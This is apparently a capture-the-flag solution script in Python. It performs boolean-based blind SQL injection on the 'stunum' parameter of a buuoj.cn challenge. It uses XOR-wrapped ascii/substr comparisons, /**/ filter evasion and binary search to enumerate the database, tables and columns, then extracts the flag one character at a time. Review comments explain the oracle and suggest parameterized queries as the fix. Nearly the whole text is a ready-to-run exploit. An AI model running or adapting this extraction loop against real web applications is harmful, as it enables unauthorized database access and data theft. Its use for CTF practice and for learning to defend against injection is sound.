颜值成绩查询

import requests

if __name__ == "__main__":
    # Boolean-based blind SQL injection against the `stunum` query parameter:
    # each request asks one yes/no question about a single character of the
    # sub-query result, and the answer is read from whether the known marker
    # text appears in the response.
    #
    # NOTE(review): the response differing with the truth value of the injected
    # expression suggests `stunum` reaches the SQL statement unparameterized.
    # Binding it as an integer parameter server-side (or rejecting non-numeric
    # input) would remove this oracle -- confirm against the server code.
    recovered = ""
    position = 0
    while True:
        position += 1
        # Search window: printable ASCII, 32 (space) up to 127.
        low, high = 32, 127

        while low < high:
            pivot = (low + high) // 2
            # Earlier enumeration stages, kept from the original write-up:
            # sql = "select(database())"
            # sql = "select/**/group_concat(distinct/**/TABLE_NAME)from(information_schema.tables)where(table_schema='ctf')"
            # sql = "select/**/group_concat(distinct/**/COLUMN_NAME)from(information_schema.columns)where(table_schema='ctf')and(table_name='flag')"
            # `/**/` and parentheses stand in for spaces -- presumably because
            # the target filters whitespace; not visible from this script.
            sql = "select/**/group_concat(value)from(ctf.flag)"
            # 1 ^ (cond) ^ 1 evaluates to 1 when cond is true and 0 when false,
            # so the lookup behaves like stunum=1 only for a true comparison.
            payload = "1^(ascii(substr((%s),%d,1))>%d)^1" % (sql, position, pivot)
            url = "http://14753567-1903-42c7-ba3e-0e698232711b.node3.buuoj.cn/?stunum=" + payload
            response = requests.get(url=url)
            # print(url)
            # print(response.text)

            # Marker present -> the character code is greater than pivot.
            code_is_above_pivot = "Hi admin, your score is: 100" in response.text
            if code_is_above_pivot:
                low = pivot + 1
            else:
                high = pivot

        # Converging on 32 means no comparison succeeded at this position
        # (character code not above 32, e.g. past the end of the string),
        # so extraction stops here.
        if low == 32:
            break
        recovered += chr(low)
        print(recovered)
